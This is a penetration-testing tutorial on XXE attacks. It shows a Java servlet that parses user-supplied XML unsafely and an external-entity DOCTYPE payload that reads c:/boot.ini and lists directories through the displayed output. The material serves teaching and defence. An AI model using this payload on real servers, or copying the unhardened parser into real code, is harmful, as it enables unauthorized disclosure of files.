Attacking Server Side XML Parsers
Attacking Server Side XML Parsers
By Kingcope
Preface
During the audit of web applications one might come across an application which handles XML files. Specifically there can be an application which allows uploading XML files which are thereafter inserted into a database and used for later displaying on the front end of the application viewable by the user. I came across a significant vulnerability class which allows an attacker (or penetration tester) to evoke a scenario which will give access to all files on the underlying file system which the application server runs as. This includes (in the case the application is programmed in the Java language) access to directory listings as well.
The source code of the vulnerable application which is later used to disclose files and directories looks like the following and seems unsuspicious from a developers point of view.
import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.*; import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; import org.w3c.dom.Document; import org.w3c.dom.Element; import org.w3c.dom.Node; import org.w3c.dom.NodeList; import org.xml.sax.InputSource; public class VulnerableServlet extends HttpServlet { public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { // Arbeit an doPost() delegieren doPost(request, response); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { try { response.setContentType("text/html"); PrintWriter out = response.getWriter(); if (request.getParameter("xmldata") == null) { out.println("<form method=\"post\" action=\"VulnerableServlet\"><textarea name=\"xmldata\" cols=75 rows=25>Input XML data here.</textarea><input type=\"submit\" value=\"Submit\"/></form>"); } else { StringReader reader = new StringReader( request.getParameter("xmldata") ); InputSource inputSource = new InputSource( reader ); DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder db = dbf.newDocumentBuilder(); Document doc = db.parse(inputSource); reader.close(); doc.getDocumentElement().normalize(); out.println("Root element " + doc.getDocumentElement().getNodeName() + "<br>"); NodeList nodeLst = doc.getElementsByTagName("employee"); out.println("Information of all employees" + "<br>"); for (int s = 0; s < nodeLst.getLength(); s++) { Node fstNode = nodeLst.item(s); if (fstNode.getNodeType() == Node.ELEMENT_NODE) { Element fstElmnt = (Element) fstNode; NodeList fstNmElmntLst = fstElmnt.getElementsByTagName("firstname"); Element fstNmElmnt = (Element) fstNmElmntLst.item(0); NodeList fstNm = fstNmElmnt.getChildNodes(); out.println("First Name : " + ((Node) fstNm.item(0)).getNodeValue() + "<br>"); NodeList lstNmElmntLst = fstElmnt.getElementsByTagName("lastname"); Element lstNmElmnt = (Element) lstNmElmntLst.item(0); NodeList lstNm = lstNmElmnt.getChildNodes(); out.println("Last Name : " + ((Node) lstNm.item(0)).getNodeValue() + "<br>"); } } } } catch (Exception e) { e.printStackTrace(); } } }
The servlet receives the request parameter xmldata from the form shown in Figure 1 and parses it using the parse() method of the javax.xml.DocumentBuilder class. Now lets feed some XML to the servlet and see what the output displays. The inserted XML to be parsed is the following employee list:
Figure 2: The form is filled with XML data When the data is parsed the user is presented with the following human readable text:
Figure 3: The output of the servlet after submitting the XML file
Lets consider the following DOCTYPE declaration: <?xml version="1.0"?> <!DOCTYPE rootelement [ <!ELEMENT rootelement (#PCDATA)> ]> <rootelement>Hello Jupiter!</rootelement>
As you can see the document type enclosed directly after the XML version tag describes the behaviour of the actual XML data. In this case it describes what data type the root element of the XML data actually is. Then we add another describer to the DOCTYPE, which in this case is special, it is the external entity declarer which references to a local file on the system (and as we can see later also applies to directories):
<?xml version="1.0"?> <!DOCTYPE rootelement [ <!ELEMENT rootelement (#PCDATA)> <!ENTITY c SYSTEM "file:///c:/boot.ini"> ]> <rootelement>&c;</rootelement>
In the above construct you can see that the variable c in the XML data will be substituted by the external data of the file c:\boot.ini, meaning that the rootelement XML element will include the contents of the file c:\boot.ini after being parsed by the servlet. So the main action a penetration tester has to take is to rewrite the DOCTYPE in a shape that it conforms to the XML elements which it actually describes. When the penetration tester has successfully written a DOCTYPE declaration which will not make the servlet fail in parsing he just has to add the variable c to the appropriate place in the XML elements which is later on displayed on the screen. In our XML example the variable is placed into the elements firstname or lastname as both are shown to the user. Let us see what happens when we input the correct DOCTYPE and click on submit.
As the above XML file illustrates the DOCTYPE is adjusted to the XML data, in this case only the root element of the XML data has to be adjusted and the external entity which references the local file has to be put in. The third employees first name is now replaced by the external entity variable and as the following figure illustrates the attack succeeds:
Figure 4: The third First Name now includes the contents of the requested file. Java does not distinguish between requested files and requested folders when parsing external entities, therefore the whole file system can be traversed.
Figure 5: When requesting the directory file://c:/ the whole directory structure is displayed by the vulnerable servlet.
Conclusion
As we see it is rather easy to trick the XML parser of a web application to disclose files remotely. All that has to be done by the attacker is to create the appropriate XML document. The attack is known as the XXE (Xml eXternal Entity) attack. The scope of the attack is often unknown as it can be applied to web applications too.